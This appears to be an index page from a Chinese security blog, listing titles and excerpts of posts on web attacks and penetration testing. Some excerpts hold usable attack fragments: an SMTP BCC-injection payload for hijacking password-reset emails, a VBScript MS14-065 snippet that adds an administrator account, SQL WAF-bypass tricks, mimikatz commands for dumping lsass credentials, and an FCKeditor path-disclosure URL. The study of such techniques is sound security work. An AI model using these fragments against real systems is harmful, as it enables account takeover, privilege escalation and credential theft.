信息安全
changetjut
好,呵呵,好...
展开
-
利用SMTP头注入劫持找回密码邮件
原Blog: http://blog.jr0ch17.com/2018/Please-email-me-your-password/思路: 利用SMTP头注入,将攻击者email地址添加为CC或BCC,从而劫持到比如找回密码邮件(需要目标业务未对邮件地址做校验就发邮件,利用场景有限)Payload: valid_user_address%40company.com%0D%0ABCC%3...原创 2018-04-27 16:01:42 · 3481 阅读 · 0 评论 -
使用HTML5和JS-Recon进行端口扫描
这是一个发表在BlackHat大会上的最新话题。HTML5有两个API可以实现跨域的调用:Cross Origin Requests和WebSockets。JavaScript可使用其与任何IP、任意端口(被阻止的除外)进行连接,这使其成为端口扫描的一个选择。这两个API都包含readyState属性,它表示在给定时间内的连接状态。每个特定的readyState值的持续时长很大程度上是基于到目翻译 2014-08-05 14:19:28 · 3825 阅读 · 0 评论 -
关于渗透测试
今天看到某安全公司网站上转载 2014-06-13 15:30:20 · 9853 阅读 · 2 评论 -
PHP5.4中删除的安全函数
前几天配置PHP5.4的时候发现PHP新版已经在一些安全函数方面进行了增改,从php自身防止一些不必要的漏洞,因此开发人员在写代码时也需要注意版本的兼容。下面讲几个涉及安全方面的函数进行说明。1、safe_mode状态:已删除描述:此函数主要限制系统相关的文件打开、命令执行等函数(具体影响函数见参考1)。当然现在也有bypasss safe_mode的方法(见参考2),通过com接口来转载 2014-05-29 21:53:17 · 1984 阅读 · 0 评论 -
DedeCMSrecommend.php文件通杀SQL注入漏洞原理分析
DedeCMSrecommend.php文件通杀SQL注入漏洞原理分析漏洞执行过程1.首先执行到plus/recommand.php,包含了include/common.inc.phprequire_once(dirname(__FILE__)."/../include/common.inc.php");2来看到include/common.inc.phpfunction _R原创 2014-03-05 19:27:01 · 15441 阅读 · 0 评论 -
备忘
/home/work/newsphp/newsroot/temp/smarty/compile_dir/原创 2014-03-02 15:48:26 · 1158 阅读 · 0 评论 -
余弦:我的渗透利器
Firefox下Firebug,调试js,HTTP请求响应观察,Cookie,DOM树观察等;GreaseMonkey,自己改了个Cookie修改脚本,其他同学可以用这款:Original Cookie Injector for Greasemonkey;Noscript,进行一些js的阻断;AutoProxy,翻墙必备;Chrome下F12打开开发转载 2013-12-14 20:04:02 · 3563 阅读 · 0 评论 -
推荐一个编码转换工具
某人说,凡是桌面上有这个图标的人,都不是什么好人。。。点我下载原创 2013-11-07 20:43:33 · 1709 阅读 · 0 评论 -
360杯信息安全技术大赛Web第一题分析
原题如下,提示是 程序员的坏习惯根据提示,在当前URL后加.bak,获得源码<?phperror_reporting(0); function auth($password, $hidden_password){ $res=0; if (isset($password) && $password!=""){ if ( $password原创 2013-08-08 13:57:55 · 5747 阅读 · 0 评论 -
XSS Funny Vector Review
HTML3与HTML5混搭 xIE的VML中的标签. click这个是Firefix对feed协议处理不当导致的,不知道算不算bug,但用来绕过A标签的协议检测倒是个不错的办法. click可以绕过不少xss filter,不过IE不支持这个实体字符. a Ƒ)SVG解析script时会将其转载 2014-09-22 15:26:19 · 1109 阅读 · 0 评论 -
Web应用里的HTTP参数污染(HPP)漏洞
HPP是HTTP Parameter Pollution的缩写。这个漏洞由S. di Paola 与L. Caret Toni在2009年的OWASP上首次公布。这也是一种注入型的漏洞,攻击者通过在HTTP请求中插入特定的参数来发起攻击。如果Web应用中存在这样的漏洞,可以被攻击者利用来进行客户端或者服务器端的攻击。下面对这个漏洞的原理做一下详细解释。 首先讲下HTTP的参数处理转载 2014-10-11 09:48:21 · 1698 阅读 · 0 评论 -
False SQL Injection and Advanced Blind SQL Injection
转自:http://www.exploit-db.com/papers/18263/转载 2014-10-11 14:35:25 · 1289 阅读 · 0 评论 -
利用URL特性绕过域名白名单检测
URL跳转漏洞主要是利用浏览器对URL特性的支持,绕过一些正则匹配不严谨的防护。原创 2017-01-09 10:15:26 · 11348 阅读 · 1 评论 -
URL跳转漏洞的危害
一直以来,对URL跳转漏洞的理解,仅限于钓鱼、欺骗等,无法影响到当前业务。但前几天看到一个漏洞,让我对URL跳转的危害理解又加深了一层。 对于URL跳转漏洞来说,某些URL跳转的方式可以带着HTTP referer头,这就会使得一些依赖referer校验的安全解决方案失效,比如仅做了referer校验的jsonp接口。这种问题不产生直接危害,但可能造成其他安全防护功能的绕过。原创 2017-01-03 20:05:55 · 22000 阅读 · 0 评论 -
一个很有意思的姿势——RFD
RFD = Reflected File Download这是BlackHat2014的一个演讲,PPT:https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf作者介绍RFD的文章:https://www.trustwave.c原创 2015-11-18 11:11:15 · 2346 阅读 · 0 评论 -
SQL注入速查表(下)与Oracle注入速查表
一、SQL注入速查表(下)0x00 目录盲注关于盲注实战中的盲注实例延时盲注WAITFOR DELAY [time](S)实例BENCHMARK()(M)实例pg_sleep(seconds)(P)掩盖痕迹-sp_password log bypass(S)注入测试一些其他的MySQL笔记MySQL中好用的函数SQL注入的高级使用转载 2015-08-27 15:41:54 · 4763 阅读 · 0 评论 -
SQL注入速查表(上)
本文由Yinzo翻译,转载请保留署名。原文地址:http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/#Enablecmdshell文档版本:1.40x00 关于SQL注入速查表现在仅支持MySQL、Microsoft SQL Server,以及一部分ORACLE和PostgreSQL。大部分样例都不能保证每一个转载 2015-08-27 15:40:34 · 5994 阅读 · 1 评论 -
IIS架构
1. 概述为了提高IIS的可靠性,安全性以及可用性,与IIS5.0和以前更早的版本不同,IIS6.0提供了一个全新的IIS架构。这个架构的详细情况如下图所示: (图 1) IIS 6.0整体架构由上可以看出,IIS 6.0的内核体系主要由如下三个组件构成:HTTP.SYS,W3SVC以转载 2015-04-16 14:14:45 · 1405 阅读 · 0 评论 -
嵌入式CSS或script中标签闭合对引号的突破
直接上代码: test{ background: url('http://www.baidu.com/aaaa'); } bbb原创 2014-11-04 11:14:06 · 2066 阅读 · 0 评论 -
MS14-065 添加用户并提升至管理员 EXP
MS14-065,添加用户并提升到管理员,IE onlyfunction runmumaa() On Error Resume Nextset shell=createobject("Shell.Application")shell.ShellExecute "net.exe","user test test /ad"shell.ShellExecute "net.exe","loc原创 2014-11-14 14:30:38 · 3674 阅读 · 0 评论 -
知道创宇研发技能表v2.1
转载的图有防盗链,懒的重新整理了,想看直接去原站吧:http://blog.knownsec.com/Knownsec_RD_Checklist/v2.1.html转载 2013-04-24 12:30:20 · 2272 阅读 · 0 评论 -
mysql注入对and or的过滤及uinon select等过滤的一个方法突破
1.and 用&& 代替2. or 用||代替3.union select from 变成 /*!union*/这种。一个例子:/ select 1 /*!union*/ select 2 from adad where 1&&1摘自 it_security绕过waf的一个思路转载 2013-04-23 09:45:42 · 2080 阅读 · 0 评论 -
域 渗透实录
1.收集信息。1-1.不论什么途径获得的内网机器,确定他在内网后,我们首先就要了解这台机器的所属人员,如果我们的目标是公司,那我们就要了解这个人在公司里的职位,他是个什么身份,有多大的权利,这都关系到他在内网里的权限。因为,作为大公司,一个高权限的人他在内网里所要用到的东西就多,那么相对他的机器,当然权限就会比一般普通员工的高很多,这在我的渗透过程中是常见的。既然有了他的机器,那么翻翻他的转载 2013-04-01 16:46:21 · 1384 阅读 · 0 评论 -
Arp反欺骗策略
来源:安全焦点作者:backspray (nimaozhi_at_163.com)近来与Arp相关恶意软件越来越猖獗,受害者的也不少,国内的各大杀毒厂商也纷纷推出Arp防火墙。但大部分防火墙虚有其表,原因下面会具体介绍。这篇文章不是科普,主要是思路,更想起到抛砖引玉的作用。让世界清静一点。此外,末学接触并熟悉Arp协议到写出Arp欺骗和反欺骗的test code,前前后后也不过一个转载 2012-11-08 20:33:06 · 1312 阅读 · 0 评论 -
Sql Injection脚本注入终极利用方法
来源:纯色笔记声明:本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责。因为 发觉其危害过大,原文已经经过大量删减及修改,即使这样本文的危害性仍然很大,所以请大家不要对国内的站点做任何具有破坏性的操作。考虑再三,偶还是决定发出来。此招手段歹毒,利用范围广泛,可以说是只要是有sql注射漏洞的网站,只要运用此法99%可以拿到webshell甚至系统权限(不敢把话说满,呵呵,经本转载 2012-11-07 22:27:31 · 2161 阅读 · 0 评论 -
mssql中public和db_owner权限下拿到webshell或者系统权限
在看之前我们先回顾一下目前在公开或者已知的public和db_owner权限拿到webshell或者系统权限的思路和方法(sysadmin权限我就不说拉,给你这么一句,只要是sysadmin,拿不到webshell或者系统权限那是你的无能)public下面我还没见到一种可以真正能利用的方法。db_owner目前公开的方法主要有5种:第一种就是最普遍的backup,现在利用差异备份生成的asp文件确转载 2012-11-07 22:03:24 · 3398 阅读 · 0 评论 -
注入中的数字型,字符型,搜索型的区别
作者:幻泉blog:http://hi.baidu.com/woshihuanquan/在数据库注入中经常有人说这个注入点为字符型的,那个注入点位数字型的,那么到底什么是数字型什么是字符型呢?其实所有的类型都是根据数据库本身表的类型所产生的,在我们创建表的时候会发现其后总有个数据类型的限制,而不同的数据库又有不同的数据类型。例如mssql就有很多自己的数据类型,但是无论转载 2012-10-26 20:47:47 · 13621 阅读 · 2 评论 -
算是个ASP木马编年史吧。。。从一个论坛上看来的
03年的ASP木马最早是由几位传说级大神开发的,简单来说相当于FSO操作文件aspmuma.org原创后来产生了一句话木马,冰狐浪子的最早,后来lake2等一些大牛,相继开发出c/s云模式的一句话木马,把execute缩短为eval05年的老兵木马是现在常用木马的雏形,aspmuma.org原创05-06年常用的木马却是海洋顶端,就技术感觉说,海洋顶端的WEBSHELL很不转载 2012-11-01 21:39:52 · 1668 阅读 · 0 评论 -
xss简单渗透测试
xss简单渗透测试Author: jianxin [80sec]EMail: jianxin#80sec.comSite: http://www.80sec.comDate: 2008-12-24From: http://www.80sec.com/release/xss-how-to-root.txt[ 目录 ]0×00 前言0×01 xss渗透测试基转载 2012-10-06 17:26:10 · 3327 阅读 · 0 评论 -
WebDav远程溢出漏洞分析
文章来源:http://www.xfocus.netWebDav远程溢出漏洞分析by isno@xfocus.org一、漏洞分析 这个漏洞可能是前些年就有牛人发现了的,不过一直没公布,直到最近微软出了安全公告大家才知道原来有这么个漏洞。虽然WebDav是通过IIS来利用这个漏洞的,但是漏洞本身并不是IIS造成的,而是ntdll.dll里面的一个API函转载 2012-09-06 16:20:48 · 3778 阅读 · 0 评论 -
Windows 蓝屏代码详解
0 0x0000 作业完成。 1 0x0001 不正确的函数。 2 0x0002 系统找不到指定的档案。 3 0x0003 系统找不到指定的路径。 4 0x0004 系统无法开启档案。 5 0x0005 拒绝存取。 6 0x0006 无效的代码。 7 0x0007 储存体控制区块已毁。 8 0x0008 储存体空间不足,无法处理这个指令。 9 0x0009 储存转载 2012-11-08 20:36:24 · 1416 阅读 · 0 评论 -
某大牛的个人入侵经验
摘自Oldjun大牛的博客,留个CopyFrom oldjun(http://www.oldjun.com/)这一年变化比较大,换了好几个工作,最终还是回到了安全的岗位,合乎自己的职业规划!平时空闲时间经常找些站练练手,基本是新闻闹出轰动的站与一些知名的大站。2008年的成果还是颇丰的,从某某国内2大知名社区论坛到某某著名交友站到某某2大读书站到某某mobile到某某政转载 2012-11-16 21:32:46 · 2417 阅读 · 0 评论 -
php上传绕过及缺陷经验解说
把原地址也贴出来吧,http://lcx.cc/?i=31461) GIF89A伪造文件头上传.缺陷:文件只验证上传Type是否为image/gif等这样的类型,GIF89A是用CA32m等这些反汇编16进制工作在文件头获取的!例子:_Evil2)SQL查询绕过(鸡助)$token = explode(".",$upload_filena转载 2012-12-13 11:22:26 · 2150 阅读 · 0 评论 -
渗透提权小思路总结
开始找工作了,先总结一点渗透的手段,面试的时候可能用的着,我始终坚信机会是留给有准备的人的,多一份努力,就多一份机遇。稍微写一点渗透的小思路、小技巧,主要讲的是思路,所有不会太详细。注意经常逛一些好的博客或者门户站,坚持下来,每天学一点思路,你会积累到很多东西,记住:技术需要时间沉淀。欢迎来俺博客玩http://www.cnseay.com (一)针对网站程序,不考转载 2013-03-19 13:02:00 · 3471 阅读 · 0 评论 -
mimikatz抓取明文密码(Windows Server 2008 R2 x64)
使用方法如下:1.privilege::debug2.inject::process lsass.exe F:\tools\x64\sekurlsa.dll3.@getLogonPasswords有图有真相:原创 2013-03-12 17:48:42 · 9214 阅读 · 0 评论 -
PSTZine_0x010x04安全幻想曲2008-SEBUGNET
来源:Ph4nt0m Security Teamhttp://www.ph4nt0m.org-a.googlepages.com/pstzine_0x01 我见过的大多数安全人员,都对技术有着一种狂热,甚至是一种偏执。这种情绪在做安全研究员的时候是非常有好处的,因为作为研究员,可能要偏执考虑到一些极端的情况。这种钻研精神,是光靠勤奋所无法达到的。但是在甲方做安全的话,可能更转载 2013-02-18 13:14:29 · 1299 阅读 · 0 评论 -
大量静态页面的站点应该以什么样的姿势切入?
Nohat 2013-01-08 19:08为客户做安全测试,但是网站和多数GOV类门户网站一样,链接几乎全部都是html的,看了就没食欲。由于我也不是科班出身,所以不懂这种站的玄机,大家谈谈一般遇到这样的站应该如何着手呢?旁站?C段?还是继续找动态交互接口?乌云众生1#upload (%bf%27%bf%27%bf%27%bf%27%)转载 2013-01-10 12:24:56 · 1366 阅读 · 0 评论 -
破那个垃圾安全狗技术总汇
转自:http://lcx.cc/?i=3253安全狗很牛吗?无视!!过安全狗主要过哪几方面:作者:鬼哥版权:www.90sec.org1.过注入2.过大马被阻拦访问3.过菜刀连接一句话被拦截4.过1.asp;.jpg这样的文件其他我没遇到了。。现在一点一点讲:1.过注入方法一:a.asp?aa转载 2013-01-05 12:40:57 · 4376 阅读 · 1 评论 -
Fckeditor上传相关
转自:http://lcx.cc/?i=17141、查看编辑器版本:/fckeditor/editor/dialog/fck_about.html/FCKeditor/_whatsnew.html2. Version 2.2 版本: Apache+linux 环境下在上传文件后面加个.突破!测试通过。2、爆绝对路径:/FCKeditor/edi转载 2012-12-18 13:15:03 · 2100 阅读 · 0 评论 -
FCKeditor爆绝对路径
转自:http://lcx.cc/?i=3161代码:FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=%2F&NewFolderName=aux版本未测试。。。原理:新建个aux文件夹,aux在windows系统不转载 2012-12-18 13:18:10 · 2471 阅读 · 0 评论